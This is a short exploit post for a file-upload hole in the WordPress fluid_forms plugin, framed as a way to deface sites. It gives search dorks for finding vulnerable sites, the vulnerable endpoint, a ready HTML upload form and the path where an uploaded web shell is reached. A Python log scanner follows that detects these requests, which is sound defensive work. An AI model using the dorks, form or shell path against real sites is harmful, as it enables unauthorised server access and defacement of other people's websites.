
WordPress Defacement Using the Fluid_forms Upload Vulnerability Exploit


#Type: CSRF & Xampp, Uploadify
#Tested: Windows XP, 7, 8, BackBox
#CMS: WordPress

Dork: inurl:fluid_forms or inurl:"/wp-content/plugins/fluid_forms/file-upload/" 

Exploit: /wp-content/plugins/fluid_forms/file-upload/server/php/

CSRF form; save it with the .html extension:


 <form method="POST" action="http://www.site.com/wp-content/plugins/fluid_forms/file-upload/server/php/" enctype="multipart/form-data"><input type="file" name="files[]" /><button>Upload</button><br/></form>

If the site is vulnerable, [] will be returned.

Access your shell at: /wp-content/plugins/fluid_forms/file-upload/server/php/files/shellmu.php
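
On the defending side, the two requests described above leave a recognisable trace in the web server access log. The following is an added example, not part of the original post: it scans combined-format log lines for POSTs to the plugin's upload handler and for requests to script files under its files/ directory. The function name, the extension list and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Paths taken from the post: the upload handler and the directory it writes to.
HANDLER = "/wp-content/plugins/fluid_forms/file-upload/server/php/"
FILES_DIR = HANDLER + "files/"
# Extensions a server may hand to PHP (assumption: typical Apache/PHP setup);
# also matches double extensions such as "x.php.jpg".
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)(\.|$)", re.I)
# Combined log format: ip - user [time] "METHOD url PROTO" status size ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) ')

def scan(lines):
    """Return findings as (kind, ip, time, path, status) tuples."""
    findings = []
    for raw in lines:
        m = LINE.match(raw)
        if not m:
            continue  # not a combined-format request line
        ip, ts, method, url, status = m.groups()
        path = unquote(url.split("?", 1)[0])  # drop query, decode %xx
        if method == "POST" and path in (HANDLER, HANDLER + "index.php"):
            findings.append(("upload", ip, ts, path, status))
        elif path.startswith(FILES_DIR):
            name = path[len(FILES_DIR):]
            if SCRIPT_EXT.search(name):
                # 200 means the file exists and was served; anything else is a probe.
                kind = "script-served" if status == "200" else "script-probed"
                findings.append((kind, ip, ts, path, status))
    return findings

# Constructed sample log lines (documentation IP ranges, made-up timestamps).
SAMPLE = [
    '203.0.113.7 - - [12/Mar/2015:10:01:02 +0000] "POST /wp-content/plugins/fluid_forms/file-upload/server/php/ HTTP/1.1" 200 210 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [12/Mar/2015:10:01:09 +0000] "GET /wp-content/plugins/fluid_forms/file-upload/server/php/files/shellmu.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [12/Mar/2015:10:02:00 +0000] "GET /wp-content/plugins/fluid_forms/file-upload/server/php/files/photo.jpg HTTP/1.1" 200 8841 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [12/Mar/2015:10:03:00 +0000] "GET /wp-content/plugins/fluid_forms/file-upload/server/php/files/x.php HTTP/1.1" 404 0 "-" "curl/7.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(*finding, sep="\t")
```

A `script-served` finding means a script file exists under the plugin's upload directory and was returned to the client, which is worth treating as an indicator of compromise and following up on disk.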


Hope this is useful.
